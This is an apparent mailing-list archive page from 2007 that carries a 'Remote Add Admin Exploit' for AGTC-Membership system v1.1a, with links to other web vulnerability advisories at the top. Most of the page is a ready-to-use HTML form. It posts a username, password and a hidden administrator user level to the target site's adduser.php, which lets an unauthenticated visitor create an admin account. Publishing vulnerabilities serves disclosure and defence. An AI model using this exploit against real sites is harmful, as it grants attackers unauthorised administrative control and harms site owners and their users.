Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Omnistar Live Software Cross-Site Scripting Vulrnability

SAXON version 5.4 Multiple Path Disclosure Vulnerabilities

SAXON version 5.4 SQL Injection Vulnerability

SAXON version 5.4 XSS Attack Vulnerability

From:	Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:	29.10.2007
Subject:	AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

<!--
- Product : AGTC-Membership system
- Version : 1.1a
- Website : http://www.agtc.co.uk
- Author  : 0x90
- HomePage : WwW.0x90.CoM.Ar
- Contact : Guns[at]0x90[dot]com[dot]ar
- Problem : Admin Added Access.
-->


<form name="form1" method="post" action="http://[target]/adduser.php">
<h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3>
 <table width="40%" border="1" align="center" bordercolor="#000000">
   <tr>
     <td width="20%"><div align="right"><strong>User Name:</strong></div></td>
     <td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td>
   </tr>
   <tr>
     <td><div align="right"><strong>Password:
</strong></div></td>
     <td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td>
   </tr>
<tr>
     <td><div align="right"><strong>Email Address:</strong></div></td>
     <td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td>
   </tr>
     <input name="userlevel" type="hidden" id="userlevel" value="4">
           <tr>
     <td>&nbsp;</td>
     <td><input type="submit" name="Submit" value="Add User">
       <input type="reset" name="Submit2" value="Reset"></form></td>
   </tr>
 </table>